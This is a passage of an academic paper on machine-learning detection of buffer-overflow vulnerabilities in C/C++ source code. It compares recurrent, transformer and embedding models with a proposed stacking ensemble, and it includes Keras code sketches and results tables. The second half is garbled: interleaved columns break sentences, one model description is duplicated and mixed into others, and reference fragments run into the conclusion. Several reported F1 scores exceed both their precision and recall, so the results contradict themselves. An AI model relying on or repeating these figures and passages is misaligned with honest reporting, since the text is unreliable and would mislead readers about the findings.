3. Vulnerability detection in source code using LSTM, BiLSTM, LSTM-Autoencoder, word2vec, BERT, and GPT-2 with semantic and syntactic features.
4. Proposal of a neural network that outperforms the results derived from existing models, together with a comparison between results derived from neural networks trained with a minimal intermediate feature representation of the texts and with semantic and syntactic features.

The rest of the paper is organized as follows: we provide a brief background study on software vulnerability detection in Section 2. Then we explain the methods we followed for our experimental research in Section 3. The results derived from the experiment are demonstrated in Section 4. Finally, Section 5 concludes the paper.
II. LITERATURE REVIEW

Researchers are interested in the recently developed machine learning strategy for identifying and preventing software and cybersecurity vulnerabilities in order to address the shortcomings of conventional static and dynamic code analysis techniques. Various machine learning techniques, including naive bayes, logistic regression, recurrent neural networks (RNN), decision trees, and support vector machines, are successfully used for classifying software security activities like malware, ransomware, and network intrusion detection. We have examined machine learning-related papers that have been applied to the software security domain. Previously, Zeng et al. [16] reviewed software vulnerability analysis and discovery using deep learning techniques. They found four game-changing methods that contributed most to software vulnerability detection using deep learning techniques. These concepts are automatic semantic feature extraction using deep learning models, end-to-end solutions for detecting buffer overflow vulnerabilities, applying a bidirectional Long Short-Term Memory (BiLSTM) model for vulnerability detection, and deep learning-based vulnerability detectors for binary code. Zhou et al. [17] proposed a method called graph neural network for vulnerability identification with function-level granularity to address the issue of information loss during the representation learning process. They transformed the samples into a code property graph format. Then, a graph neural network made up of a convolutional layer and a gated graph recurrent layer learned the vulnerable programming pattern. This method improves the detection of intra-procedural vulnerabilities. However, they did not address inter-procedural vulnerabilities. Iorga et al. [18] demonstrated a process for early detection of cyber vulnerabilities from Twitter, building a corpus of 650 annotated tweets related to cybersecurity articles. They used the BERT model and transfer learning model for identifying cyber vulnerabilities from the articles. The BERT model shows 91% accuracy, which they found adequate for identifying relevant posts or news articles. Sauerwein et al. [19] presented an approach for automated classification of attackers' TTPs by combining NLP with ML techniques. They extracted the attackers' TTPs from unstructured text. To extract the TTPs, they used a combination of NLP and ML techniques. They assessed all potential combinations of the specified NLP and ML approaches with 156 processing pipelines and an automatically generated training set. They found that tokenization, POS tagging, IoC replacement, lemmatization, one-hot encoding, binary relevance, and support vector machine performed best for the classification of techniques and tactics. Harer et al. [20] created a dataset composed of millions of open-source functions annotated with results from static analysis. The performance of source-based models is then compared against approaches applied to artifacts extracted from the build process, with source-based methods coming out on top. The best performance is found when combining characteristics learned by deep models with tree-based models. They evaluated the use of deep neural network models alongside more conventional models like random forests. Finally, their best model achieved an area under the ROC curve of 0.87 and an area under the precision-recall curve of 0.49. Pistoia et al. [21] surveyed static analysis methods for identifying security vulnerabilities in software systems. They discussed three topics that have been linked to security vulnerability sources: application programming interface conformance, information flow, and access control. They addressed static analysis methods for stack-based access control and role-based access control separately, since access control systems can be divided into these two main types. They reviewed some effective static analysis techniques, including the Mandatory Access Rights Certification of Objects (MARCO) algorithm, the Enterprise Security Policy Evaluation (ESPE) algorithm, the Static Analysis for Validation of Enterprise Security (SAVES) algorithm, and Hammer, Krinke, and Snelting's algorithm. However, static analysis produces false positive results and relies on predefined rules. For new errors, the static analysis method is unsuitable, as it cannot recognize and detect them.
III. METHODOLOGY

From the standpoint of source code, the majority of flaws originate in critical processes that pose security risks, such as functions, assignments, or control statements. Adversaries can directly or indirectly affect these crucial operations by manipulating factors or circumstances. To successfully understand patterns of security vulnerabilities from code, neural network models must be trained on a large number of instances. In this study, we analyze the lowest level of codes in software package functions, capable of capturing vulnerable flows. We utilized a sizable dataset containing millions of function-level examples of C and C++ code from the SATE IV Juliet Test Suite, the Debian Linux distribution, and open-source Git repositories on GitHub, as mentioned in Russell's work [22]. Our project employs the CWE-119 vulnerability feature, which indicates issues related to buffer overflow vulnerability. Buffer overflow occurs when data written to a buffer exceeds its length, overwriting storage units outside the buffer. According to a 2019 Common Weakness Enumeration report, buffer overflow vulnerability has become the most adversely affected issue. Although we focus on buffer overflow, our method can identify other vulnerabilities. Figure 1 illustrates an intra-procedural buffer overflow vulnerability. Our dataset is divided into three subfolders—train, validation, and test—each containing a CSV file with 100,000, 20,000, and 10,000 data instances, respectively. The CSV files store text data and corresponding labels, allowing systematic evaluation of the model's performance and adaptability throughout the learning process.

Fig. 1: An example of buffer overflow vulnerability.

We analyzed the dataset and found some common words (shown in Table I) with their corresponding counts. The visualization of common words in the dataset provides a preliminary understanding of what kind of important features the dataset might have.

TABLE I: Most common words and their frequencies

index | Common words | Count
0     | =            | 505570
1     | if           | 151663
2     | {\n          | 113301
3     | ==           | 92654
4     | return       | 77438
5     | *            | 71897
6     | the          | 71595
7     | }\n          | 63182
9     | int          | 53673
10    | /*           | 51910
11    | <            | 43703
12    | */\n         | 43591
13    | +            | 41855
14    | to           | 39072
15    | &&           | 36180
16    | for          | 35849
17    | }\n\n        | 34017
18    | char         | 33334
19    | else         | 31358

1) Data Preprocessing: In this study, we conducted a series of data preprocessing techniques to prepare our dataset for the neural networks. The data preprocessing steps we employed include tokenization, stop word removal, stemming, lemmatization, and the use of pre-trained embeddings. Initially, we performed tokenization, which is the process of breaking down the source code into smaller units called tokens. Tokens represent the basic units of analysis for computational purposes in natural language processing tasks. For this process, we utilized the Keras tokenizer, which provides methods such as tokenize() and detokenize() to process plain text and separate words [23]. Following tokenization, we applied stop word removal, stemming, and lemmatization techniques to further preprocess the tokens. Stop word removal eliminates common words that do not provide significant information, while stemming and lemmatization normalize the tokens by reducing them to their root form. These techniques help in reducing noise and improving the efficiency of the neural networks.
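A minimal sketch of this tokenization step is given below, assuming the standard Keras Tokenizer API (fit_on_texts / texts_to_sequences); the vocabulary size, sequence length, and the sample function are illustrative choices, not values taken from the paper.

# Sketch of converting function-level source code to integer sequences.
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences

functions = ["int main ( ) { char buf [ 8 ] ; strcpy ( buf , argv [ 1 ] ) ; }"]

tokenizer = Tokenizer(num_words=10000, filters="", lower=False)  # keep C symbols
tokenizer.fit_on_texts(functions)                    # build the integer vocabulary
sequences = tokenizer.texts_to_sequences(functions)  # minimal intermediate repr.
padded = pad_sequences(sequences, maxlen=500)        # fixed-length model input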
We first converted the tokens into numerical representations using a minimal intermediate representation with the Keras tokenizer. The Keras tokenizer assigns a unique integer index to each token in the vocabulary and represents the source code as a sequence of these integer indices. This representation is more efficient than one-hot encoding, as it does not involve creating large, sparse vectors. However, it still lacks semantic information about the tokens. To further enhance the representation of the source code tokens and better capture semantic and syntactic information, we utilized pre-trained embeddings, namely GloVe and fastText. We stacked GloVe and fastText embeddings together for extracting the semantic and syntactic information from the source code. Both of these embeddings have demonstrated strong performance in various NLP tasks and can effectively capture the relationships between words in the source code. GloVe is an unsupervised learning algorithm that generates vector representations of words based on global word-word co-occurrence statistics from a corpus [24]. FastText, an extension of the skip-gram method, generates character n-grams of varying lengths for each word and learns weights for each n-gram, as well as the entire word token, allowing the model to capture the meaning of suffixes, prefixes, and short words [25]. We separately fed the minimal intermediate representation with the Keras tokenizer and the semantic and syntactic representations derived from GloVe and fastText into our neural network models. This approach allowed us to compare the performance of the models when using different input representations, helping us identify the most effective method for detecting security vulnerabilities in the source code.
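One way to "stack" the two embeddings, as described above, is to concatenate a GloVe vector and a fastText vector per token into a single embedding matrix. The sketch below assumes plain-text vector files and 100-d GloVe plus 300-d fastText dimensions; the file names, dimensions, and concatenation choice are illustrative assumptions.

# Sketch of building a stacked GloVe + fastText embedding matrix.
import numpy as np

def load_vectors(path):
    vecs = {}
    with open(path, encoding="utf-8") as f:
        for line in f:
            parts = line.rstrip().split(" ")
            if len(parts) < 3:
                continue  # skip the count/dim header some .vec files carry
            vecs[parts[0]] = np.asarray(parts[1:], dtype="float32")
    return vecs

glove = load_vectors("glove.6B.100d.txt")   # hypothetical 100-d GloVe file
fasttext = load_vectors("cc.en.300.vec")    # hypothetical 300-d fastText file

vocab = tokenizer.word_index                # from the fitted Keras tokenizer
dim = 100 + 300
matrix = np.zeros((len(vocab) + 1, dim))
for word, idx in vocab.items():
    g = glove.get(word, np.zeros(100))
    ft = fasttext.get(word, np.zeros(300))
    matrix[idx] = np.concatenate([g, ft])   # stacked semantic/syntactic features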
A. Classification Models

In this section, we discuss the various classification models that were utilized in our study. These models include Simple RNN, LSTM, BiLSTM, LSTM-Autoencoder, Word2vec, BERT, and GPT-2. These models are designed to work with different types of data, such as text, time series, and sequences, and have been widely employed in natural language processing and other related tasks.

B. Simple Recurrent Neural Network (RNN)

The Simple Recurrent Neural Network (RNN) is a type of artificial neural network that can model sequential data by utilizing a directed graph and temporally dynamic behavior. RNNs consist of an input layer, a hidden layer, and an output layer [26]. These networks have a memory state added to each neuron, allowing them to capture temporal dependencies in the data. The dimensionality of the input layer in our Simple RNN model is determined based on the input data features. The hidden layer consists of 256 units, which use memory states to capture temporal dependencies in the data. We use the hyperbolic tangent (tanh) activation function in the hidden layer to introduce non-linearity into the model. We chose this activation function due to its ability to handle vanishing gradients more effectively compared to other activation functions like sigmoid. The output layer of the Simple RNN model is designed to generate predictions based on the processed input data. The number of units in the output layer corresponds to the number of classes, which is two. We use an appropriate activation function, such as sigmoid for binary classification, in the output layer to generate probability scores for each class. To optimize the model, we choose the binary cross-entropy loss function and employ the Adam optimization algorithm. We set hyperparameters such as the learning rate to 0.001, the batch size to 32, and the number of training epochs to 50.

C. Long Short-Term Memory (LSTM)

The Long Short-Term Memory (LSTM) is a type of recurrent neural network designed to solve the vanishing and exploding gradient problem of traditional RNNs. It was first proposed by Hochreiter and Schmidhuber [27]. Using this model for sequential datasets is effective, as it can handle single data points. It follows the Simple RNN model's design and is an extended version of that model [28, 29]. Our LSTM model consists of an input layer that determines the dimensionality of the input data features. We incorporated three hidden layers, each containing 128 memory cells that can capture long-term dependencies in the input sequence. The output of each LSTM layer is fed into a dropout layer with a dropout rate of 0.2 to prevent overfitting. The final output of the last LSTM layer is fed into a dense layer with two units and a sigmoid activation function to produce the final binary classification output. The LSTM cell comprises three gates: the input gate, forget gate, and output gate, which regulate the flow of information into and out of the cell. To introduce non-linearity into the model, we use the hyperbolic tangent (tanh) activation function in the LSTM cell. Furthermore, we utilize the Rectified Linear Unit (ReLU) activation function in the output layer to generate non-negative predictions. We optimize the LSTM model using the binary cross-entropy loss function and the Adam optimization algorithm. The model's hyperparameters include a learning rate of 0.001, a batch size of 32, and 50 training epochs.
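A minimal Keras sketch of the LSTM configuration just described follows. The text above specifies a two-unit sigmoid head; the sketch uses the equivalent single-sigmoid-unit idiom for binary output, and the embedding dimensions are assumptions carried over from the earlier sketches.

# Sketch of the three-layer LSTM classifier (128 units each, dropout 0.2).
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Embedding, LSTM, Dropout, Dense
from tensorflow.keras.optimizers import Adam

model = Sequential([
    Embedding(input_dim=10001, output_dim=400, mask_zero=True),
    LSTM(128, return_sequences=True),
    Dropout(0.2),
    LSTM(128, return_sequences=True),
    Dropout(0.2),
    LSTM(128),
    Dropout(0.2),
    Dense(1, activation="sigmoid"),  # vulnerable / not-vulnerable probability
])
model.compile(optimizer=Adam(learning_rate=0.001),
              loss="binary_crossentropy", metrics=["accuracy"])
# model.fit(padded, labels, batch_size=32, epochs=50, validation_data=...)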
D. Bidirectional Long Short-Term Memory (BiLSTM)

The Bidirectional Long Short-Term Memory (BiLSTM) is a type of recurrent neural network that enhances the capabilities of the traditional LSTM by introducing bidirectional processing of the input sequence. It was first proposed by Graves [30]. This idea sets it apart from the LSTM model, which can only learn patterns from the past to the future [31]. Our BiLSTM model comprises an input layer that determines the dimensionality of the input data features. We have incorporated three hidden layers, each containing 128 memory cells that can capture long-term dependencies in the input sequence. The output of each BiLSTM layer is fed into a dropout layer with a dropout rate of 0.2 to prevent overfitting. The final output of the last BiLSTM layer is fed into a dense layer with two units and a sigmoid activation function to produce the final binary classification output. The BiLSTM cell has two sets of three gates, namely the input gate, forget gate, and output gate: one set that processes the input sequence in the forward direction and another set that processes the input sequence in the backward direction. This bidirectional processing allows the model to capture dependencies in both the past and future context of the input sequence. To introduce non-linearity into the model, we use the hyperbolic tangent (tanh) activation function in the BiLSTM cell. Furthermore, we utilize the Rectified Linear Unit (ReLU) activation function in the output layer to generate non-negative predictions. We optimize the BiLSTM model using the binary cross-entropy loss function and the Adam optimization algorithm. The model's hyperparameters include a learning rate of 0.001, a batch size of 32, and 50 training epochs.

E. LSTM-Autoencoder

The LSTM-Autoencoder is a variant of the Long Short-Term Memory (LSTM) model that utilizes an autoencoder architecture. The LSTM-Autoencoder is designed to read input sequences, encode sequences, decode sequences, and reconstruct sequences for a given sequential dataset, and is referred to as an encoder-decoder [32]. Its performance is estimated based on how well the model can recreate the sequence. The LSTM autoencoder can be used on video, text, audio, and time-series sequence data. The model accepts a series of inputs of various lengths and produces outputs for various purposes, such as translating from one language to another. The series is transformed into a vector representation by the encoder, and the vector is transformed back into a sequence of outputs or texts by the decoder. The meaning of the outputs is maintained in the vector representation. In this model, we have an input layer that determines the dimensionality of the input data features. The LSTM encoder layer contains 128 memory cells that can capture long-term dependencies in the input sequence. The LSTM decoder layer has the same number of memory cells as the encoder layer, which allows the model to reconstruct the input sequence. To introduce non-linearity into the model, we use the hyperbolic tangent (tanh) activation function in the LSTM cells. Additionally, we utilize the Mean Squared Error (MSE) loss function to calculate the reconstruction loss of the autoencoder. The model's hyperparameters include a learning rate of 0.001, a batch size of 32, and 50 training epochs. To evaluate the performance of the LSTM-Autoencoder, we calculate the reconstruction error between the input and the reconstructed sequence; the lower the reconstruction error, the better the model's ability to capture the input sequence's structure.
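The encoder-decoder shape described for the LSTM-Autoencoder can be sketched in Keras as below; the sequence length and feature dimension are illustrative, and the RepeatVector/TimeDistributed pattern is the common Keras idiom for this architecture rather than the paper's exact code.

# Sketch of a 128-unit LSTM encoder-decoder trained on reconstruction (MSE).
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, RepeatVector, TimeDistributed, Dense

timesteps, features = 500, 400
autoencoder = Sequential([
    LSTM(128, activation="tanh", input_shape=(timesteps, features)),  # encoder
    RepeatVector(timesteps),                  # repeat latent vector per timestep
    LSTM(128, activation="tanh", return_sequences=True),              # decoder
    TimeDistributed(Dense(features)),         # reconstruct each timestep
])
autoencoder.compile(optimizer="adam", loss="mse")
# Low reconstruction error on held-out samples indicates well-captured structure.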
from one language to another. The series is transformed into by looking at the surrounding words [34]. The BERT model a vector representation by the encoder, and the vector is consists of 12 transformer blocks for the base version and transformed back into a sequence of outputs or texts by the 24 transformer blocks for the large version. Each transformer decoder. The meaning of the outputs is maintained in the block has a multi-head attention mechanism and a feed-forward vector representation. In this model, we have an input layer neural network, making it capable of modeling long-term that determines the dimensionality of the input data features. dependencies in the input sequence. In our implementation of The LSTM encoder layer contains 128 memory cells that can BERT, we utilized the pre-trained BERT model and fine-tuned capture long-term dependencies in the input sequence. The it on our specific NLP task. We utilized the pre-trained BERT LSTM decoder layer has the same number of memory cells model with 12 transformer blocks, 12 attention heads, and 110 as the encoder layer, which allows the model to reconstruct million parameters. We added a dense layer with 2 units and the input sequence. To introduce non-linearity into the model, a sigmoid activation function to perform binary classification. we use the hyperbolic tangent (tanh) activation function in the We utilized the Binary Cross-Entropy loss function and Adam LSTM cells. Additionally, we utilize the Mean Squared Error optimization algorithm to optimize the model. We set the (MSE) loss function to calculate the reconstruction loss of the learning rate to 2e-5 and the batch size to 32. To fine-tune the autoencoder. The model’s hyperparameters include a learning pre-trained BERT model, we trained it on our specific NLP rate of 0.001, batch size of 32, and 50 training epochs. To eval- task using a training set of 100,000 instances and a validation uate the performance of the LSTM-Autoencoder, we calculate set of 20,000 instances. We trained the model for 3 epochs and the reconstruction error between the input and reconstructed evaluated its performance on a separate test set, which constists sequence. The lower the reconstruction error, the better the of 10,000 instances. model’s ability to capture the input sequence’s structure. H. GPT-2 GPT-2 (Generative Pre-trained Transformer 2) is a state- F. Word2vec of-the-art language model developed by OpenAI. It is a transformer-based language model that can generate coherent Word2vec is a word embedding model specifically designed and fluent text in a wide range of styles and topics [35]. GPT- for working with textual data. Word embedding is a tech- 2 has a large number of parameters, with the base version nique for representing words that allows computer programs having 117 million parameters, and the largest version having to understand words with similar meanings. By employing 1.5 billion parameters. In our implementation of GPT-2, we a neural network model to map words into vectors of real utilized the pre-trained GPT-2 model to generate text for our numbers, word2vec is capable of capturing significant accurate specific NLP task. We fine-tuned the pre-trained GPT-2 model syntactic and semantic word relationships. After training, the on a large corpus of text relevant to our task to improve its two-layer neural network can recognize synonymous terms and performance. We used the GPT-2 model with 117 million suggest new words for incomplete phrases [33]. 
I. Proposed Model

We propose a stacking ensemble learning approach to improve the performance of our system. Stacking ensemble is an advanced machine learning technique that combines multiple heterogeneous weak learners (base models) to form a single stronger model (meta-learner). In this approach, the base models' predictions are used as input to the meta-learner, which ultimately makes the final prediction. The meta-learner used in this case is a logistic regression model, while the base models consist of Simple RNN, LSTM, BiLSTM, word2vec, and LSTM-Autoencoder. These models are trained with one-dimensional data as input. Since the predicted dataset from Level 0 already contains the expected values' probabilities, the meta-learner can provide accurate probabilities from Level 0. To mitigate overfitting, the meta-learner is trained using both the validation dataset and the Level 0 outputs. The final result is the level-1 prediction.
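A compact sketch of this Level-0/Level-1 scheme follows: each base model's predicted probability on the validation set becomes one input column for a logistic-regression meta-learner. The base-model variables are placeholders for already-trained Keras models whose predict() returns P(vulnerable); the sklearn choice for the meta-learner is an assumption consistent with the description above.

# Sketch of stacking: Level-0 probabilities feed a Level-1 logistic regression.
import numpy as np
from sklearn.linear_model import LogisticRegression

def level0_matrix(models, X):
    # One column of predicted probabilities per base model.
    return np.column_stack([m.predict(X).ravel() for m in models])

base_models = [simple_rnn, lstm, bi_lstm, word2vec_clf, lstm_autoencoder]  # trained
meta = LogisticRegression()
meta.fit(level0_matrix(base_models, X_val), y_val)          # Level-1 training
y_final = meta.predict(level0_matrix(base_models, X_test))  # final prediction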
Fig. 2: Proposed stacking ensemble learning architecture.

The architecture is divided into two levels, Level 0 and Level 1, as shown in Figure 2. Level 0 consists of the Simple RNN, LSTM, BiLSTM, word2vec, and LSTM-Autoencoder models. After learning the data patterns, each of the base models generates predictions simultaneously. All models in Level 0 contribute equally to the overall model performance. Level 1, also referred to as the meta-learner, is built using logistic regression. The meta-learner at Level 1 is fed the Level 0 predicted outputs as input. Based on the Level 0 predictions, the meta-learner calculates the best weighted outputs. A "meta-learner" is a model that can quickly learn a pattern or adapt to different datasets with a small amount of training data. It learns patterns from the outputs generated by the five base models. As a result, the model can effectively learn completely new data and produce acceptable output. The meta-learner's parameters are a combination of the parameters of the five neural networks in the base models.

Mathematically, the stacking ensemble learning approach can be represented as follows. Let $M$ be the number of base models, $p_i^m$ be the probability of the positive class for the $i$-th sample predicted by the $m$-th base model, and $w_m$ be the weight assigned to the $m$-th base model. The weighted probability $p_i^{\text{weighted}}$ for the $i$-th sample can be computed as:

$p_i^{\text{weighted}} = \sum_{m=1}^{M} w_m \cdot p_i^m$

The weights $w_m$ are determined by the meta-learner using the Level 0 predictions and the validation data. The final prediction $y_i^{\text{final}}$ for the $i$-th sample can be computed using the logistic function:

$y_i^{\text{final}} = \frac{1}{1 + e^{-p_i^{\text{weighted}}}}$

By using a diverse set of base models, we can mitigate the limitations of traditional stacking ensemble approaches that employ similar base models, leading to similar predictions. If a single base model performs poorly on the dataset, there is a high likelihood that the final output will also be inferior. Conversely, with a diverse set of base models, the strengths and weaknesses of individual models complement each other, which results in a more robust and accurate overall model. This is because each base model is able to capture different aspects or patterns in the data, thereby reducing the reliance on any single model's performance. Additionally, the meta-learner can effectively combine these diverse predictions to generate a more accurate and stable final prediction, minimizing the impact of individual model biases or errors. In conclusion, the utilization of heterogeneous base models in a stacking ensemble approach provides a more resilient and powerful predictive model, capable of handling various types of data and delivering superior performance compared to traditional ensemble methods.

Algorithm 1: Proposed Stacking Ensemble Learning Algorithm

Function stacking_ensemble(data, train_ratio, val_ratio, test_ratio):
    // Initialize Level 0 base models
    simple_rnn <- SimpleRNN()
    lstm <- LSTM()
    bi_lstm <- BiLSTM()
    lstm_autoencoder <- LSTM_Autoencoder()
    word2vec_model <- Word2Vec()
    models <- [simple_rnn, lstm, bi_lstm, lstm_autoencoder, word2vec_model]
    // Initialize Level 1 meta-learner
    meta_learner <- LogisticRegression()
    // Split the data into training, validation, and testing sets
    X_train, X_val, X_test, y_train, y_val, y_test <- data_split(data, train_ratio, val_ratio, test_ratio)
    // Train Level 0 base models
    foreach model in models do
        model.fit(X_train, y_train)
    // Make predictions with Level 0 base models
    Level0_outputs <- list()
    foreach model in models do
        pred <- model.predict(X_val)
        Level0_outputs.append(pred)
    // Concatenate Level 0 outputs
    Level0_outputs_combined <- concatenate(Level0_outputs)
    // Train Level 1 meta-learner
    meta_learner.fit(Level0_outputs_combined, y_val)
    // Make final predictions with Level 1 meta-learner
    Level0_test_outputs <- list()
    foreach model in models do
        test_pred <- model.predict(X_test)
        Level0_test_outputs.append(test_pred)
    // Concatenate Level 0 test outputs
    Level0_test_outputs_combined <- concatenate(Level0_test_outputs)
    // Generate Level 1 final predictions
    final_predictions <- meta_learner.predict(Level0_test_outputs_combined)
    return final_predictions

IV. EVALUATION METRICS

In order to assess the performance of the neural networks and our proposed stacking ensemble model, we have employed a range of evaluation metrics that provide insight into various aspects of model performance. These metrics include precision, recall, F1-score, accuracy, and execution time. Each of these metrics contributes to a comprehensive understanding of the model's effectiveness, generalization, and efficiency [36–38]. Below, we provide a brief description of each evaluation metric.

A. Precision

Precision is a measure of the accuracy of the positive predictions made by the model. It is calculated as the ratio of true positive predictions to the sum of true positive and false positive predictions. In other words, it quantifies the proportion of correct positive predictions among all the instances predicted as positive. A higher precision value indicates that the model is better at identifying relevant instances and minimizing false positive predictions.

Precision = True Positives / (True Positives + False Positives)    (1)

B. Recall

Recall, also known as sensitivity or true positive rate, measures the proportion of actual positive instances that are correctly identified by the model. It is calculated as the ratio of true positive predictions to the sum of true positive and false negative predictions. A higher recall value indicates that the model is better at detecting positive instances and minimizing false negative predictions.

Recall = True Positives / (True Positives + False Negatives)    (2)

C. F1-score

F1-score is the harmonic mean of precision and recall, and it provides a balanced measure of both metrics. It is particularly useful when dealing with imbalanced datasets, where one class is significantly more prevalent than the other. The F1-score ranges from 0 to 1, with a higher value indicating better overall performance of the model in terms of both precision and recall.

F1-score = 2 · (Precision · Recall) / (Precision + Recall)    (3)

D. Accuracy

Accuracy is a widely-used metric that quantifies the proportion of correct predictions made by the model, both positive and negative, relative to the total number of instances. It provides an overall indication of the model's performance, but it may not be a reliable metric when dealing with imbalanced datasets, as it can be biased towards the majority class.

Accuracy = (True Positives + True Negatives) / Total Instances    (4)

E. Execution Time

Execution time is a measure of the computational efficiency of the model. It refers to the amount of time required to train the model and make predictions. A shorter execution time indicates that the model is more efficient, which can be particularly important in real-world applications where time constraints are critical. By evaluating the execution time, we can assess the trade-offs between model performance and computational resources.

These evaluation metrics provide a comprehensive and robust assessment of our neural network and proposed model's performance. By considering multiple aspects of performance, we can ensure that our model is not only accurate but also efficient, generalizable, and reliable across various datasets and application scenarios.
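Continuing the earlier stacking sketch, the four quality metrics above plus wall-clock time can be computed with scikit-learn as follows; y_test, meta, base_models, and level0_matrix are assumed from the previous sketch.

# Sketch of computing the evaluation metrics for the final predictions.
import time
from sklearn.metrics import precision_score, recall_score, f1_score, accuracy_score

start = time.time()
y_pred = meta.predict(level0_matrix(base_models, X_test))
elapsed = time.time() - start  # inference portion of the execution time

print("precision", precision_score(y_test, y_pred),
      "recall", recall_score(y_test, y_pred),
      "f1", f1_score(y_test, y_pred),
      "accuracy", accuracy_score(y_test, y_pred),
      "seconds", round(elapsed, 2))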
Our evaluation metrics included accuracy, fastText word embedding algorithms. The results demonstrate precision, recall, and F1 score, with a focus on minimizing false that all models achieved higher accuracy and F1 score com- positives and false negatives. We trained seven neural network pared to the results in Figure 3. The proposed model continues models (Simple RNN, LSTM, BiLSTM, word2vec, BERT, to perform the best with an accuracy of 0.95 and an F1 score GPT-2, and LSTM-Autoencoder) and our proposed stacking of 0.99. However, the execution time of the proposed model is ensemble neural network model. Our ensemble learning model longer compared to Figure 3, taking 2 hours and 46 minutes. outperformed single models, achieving the highest accuracy in These figures provide a clear comparison of the performance vulnerability prediction. of different neural network models and highlight the effective- Table 2 presents the results of vulnerable source code ness of using word embedding algorithms for improving the classification using different neural network models without classification results of vulnerable source code. The proposed word embedding algorithms. The Simple RNN model achieves model performs well in both scenarios, showing its potential an accuracy of 0.89, precision of 0.88, recall of 0.88, and F1 as a reliable classification model. score of 0.92, with an execution time of 42 minutes and 8 In Table 4, we present a comparison analysis between seconds. The LSTM model has slightly better performance with our proposed model and previous works in the domain of an accuracy of 0.90, precision of 0.90, recall of 0.90, and F1 vulnerability detection. The table highlights the differences in score of 0.92, and takes 29 minutes and 48 seconds to run. terms of the purpose of each study, the data used, whether The BiLSTM model shows further improvement, obtaining an semantic or syntactic feature extraction was performed, the accuracy of 0.91, precision of 0.93, recall of 0.90, and F1 score highest performance achieved, and if efficiency measurements of 0.87, but requires 2 hours and 5 minutes for execution. were conducted. The Word2vec model yields an accuracy of 0.89, precision Lorga et al. [18] aimed at vulnerability detection using of 0.92, recall of 0.95, and F1 score of 0.93, with a runtime of Twitter text data, but they did not perform semantic or syn-
40 minutes and 2 seconds. The LSTM Autoencoder model has tactic feature extraction. Their model achieved an accuracy of an accuracy of 0.91, precision of 0.93, recall of 0.94, and F1 94.96%, and they did not provide any efficiency measurements. score of 0.94, taking 53 minutes and 13 seconds for execution. Similarly, Foret et al. [39] worked on vulnerability detection The BERT model performs better with an accuracy of 0.92, using news articles without incorporating semantic or syntactic precision of 0.93, recall of 0.93, and F1 score of 0.95, but features, resulting in an 87% accuracy. No efficiency measure- requires 2 hours and 38 minutes to run. The GPT-2 model has ment analysis was conducted in their work as well. Harer et an accuracy of 0.92, precision of 0.97, recall of 0.98, and F1 al. [20] and Russell et al. [22] both focused on vulnerability score of 0.97, with a considerably longer execution time of 7 detection in source code but did not consider semantic or hours and 48 minutes. Lastly, the proposed model outperforms syntactic feature extraction. Their models achieved F1-scores the other models with an accuracy of 0.94, precision of 0.99, of 49.99% and 56.6%, respectively, without any efficiency recall of 0.98, and F1 score of 0.99, and takes 2 hours and 31 measurement analysis. Behzadan et al. [40] also worked on vul- minutes to execute. nerability detection in source code without extracting semantic Table 3 shows the results when using GloVe and Fast- or syntactic features. They reported an accuracy of 94.72%, Text embeddings. In general, the performance of all models but no efficiency measurement analysis was performed. improved when using these embeddings. The Simple RNN, Our proposed model targets vulnerability detection in source LSTM, BiLSTM, and Word2vec models show a similar trend code and incorporates semantic and syntactic feature extraction in improvement, with their respective accuracies increasing to using GloVe and fastText embeddings. As a result, our modelTABLE II: Vulnerable Source code Classification results using different Neural network models with no word embedding algorithms Models Accuracy precision Recall F1 Execution Score Time Simple RNN 0.89 0.88 0.88 0.92 42min 8s LSTM 0.90 0.90 0.90 0.92 29min 48s BiLSTM 0.91 0.93 0.90 0.87 2h 5min Word2vec 0.89 0.92 0.95 0.93 40min 2s LSTMAutoencoder 0.91 0.93 0.94 0.94 53min 13s BERT 0.92 0.93 0.93 0.95 2h 38min Gpt2 0.92 0.97 0.98 0.97 7h 48min Proposed Model 0.94 0.99 0.98 0.99 2h 31min TABLE III: Vulnerable Source code Classification results using different Neural network models with embedding algorithms GloVe + fastText Models Accuracy precision Recall F1 Execution Score time Simple RNN 0.92 0.93 0.93 0.97 42min 8s LSTM 0.92 0.93 0.95 0.97 33min 13s BiLSTM 0.93 0.96 0.96 0.99 45min 3s Word2vec 0.94 1.00 0.98 0.99 42min 56s LSTMAutoencoder 0.90 0.93 0.94 0.95 59min 53s BERT 0.94 0.95 0.95 0.99 5h 16min Gpt2 0.95 0.97 0.98 0.99 8h 33min Proposed Model 0.95 0.97 0.98 0.99 2h 46min TABLE IV: Comparative analysis with previous work Previous authors Purpose Data Semantic or Syn- Highest percent- Efficiency Mea- tactic feature ex- age surement? traction? Lorga et al. [18] Vulnerability detection Twitter text No 94.96% No data (Accuracy) Foret et al. [39] Vulnerability detection News No 87% (Accuracy) No Articles Harer et al. [20] Vulnerability detection Source code No 49.99% (F1- No score) Russell et al. [22] Vulnerability detection Source code No 56.6% (F1-score) No Behzadan et al. 
Vulnerability detection Source code No 94.72% No [40] (Accuracy) Our Proposed Vulnerability detection Source code Yes 95% (Accuracy) Yes Model achieves the highest accuracy of 95% compared to the previ- VI. CONCLUSION ous works. Moreover, we contribute to efficient measurement Our research aims to detect implementation vulnerabilities analysis and perform an in-depth analysis of the features that early in the development cycle by leveraging the power of were not considered in previous studies. This comprehensive neural networks. We have collected a large dataset of open- approach allows us to better understand the factors influencing source C and C++ code and developed a scalable and efficient the performance of vulnerability detection models and develop vulnerability detection method based on various neural network more effective methods for detecting security vulnerabilities in models. We compared the performance of different models, source code. including Simple RNN, LSTM, BiLSTM, LSTM-Autoencoder,Fig. 3: Performance Metrics for Different Neural Network Models on Vulnerable Source Code without Word Embedding Algorithms Word2Vec, BERT, and GPT-2, and found that models with ceedings of the 28th international conference on Software semantic and syntactic information extracted using state-of-the- engineering, pp. 492–501, 2006. art word embedding algorithms such as GloVe and FastText [2] T. Manikandan, B. Balamurugan, C. Senthilkumar, outperform those with a minimal text representation. Our R. R. A. Harinarayan, and R. R. Subramanian, “Cyberwar proposed neural network model has shown to provide higher is coming,” Cyber Security in Parallel and Distributed accuracy with greater efficiency than the other models evalu- Computing: Concepts, Techniques, Applications and Case ated. We have also analyzed the execution time of the models Studies, pp. 79–89, 2019.
and proposed a trade-off between accuracy and efficiency. Overall, our research contributes to the development of large-scale machine learning systems for function-level vulnerability identification in source code auditing.

ACKNOWLEDGEMENT

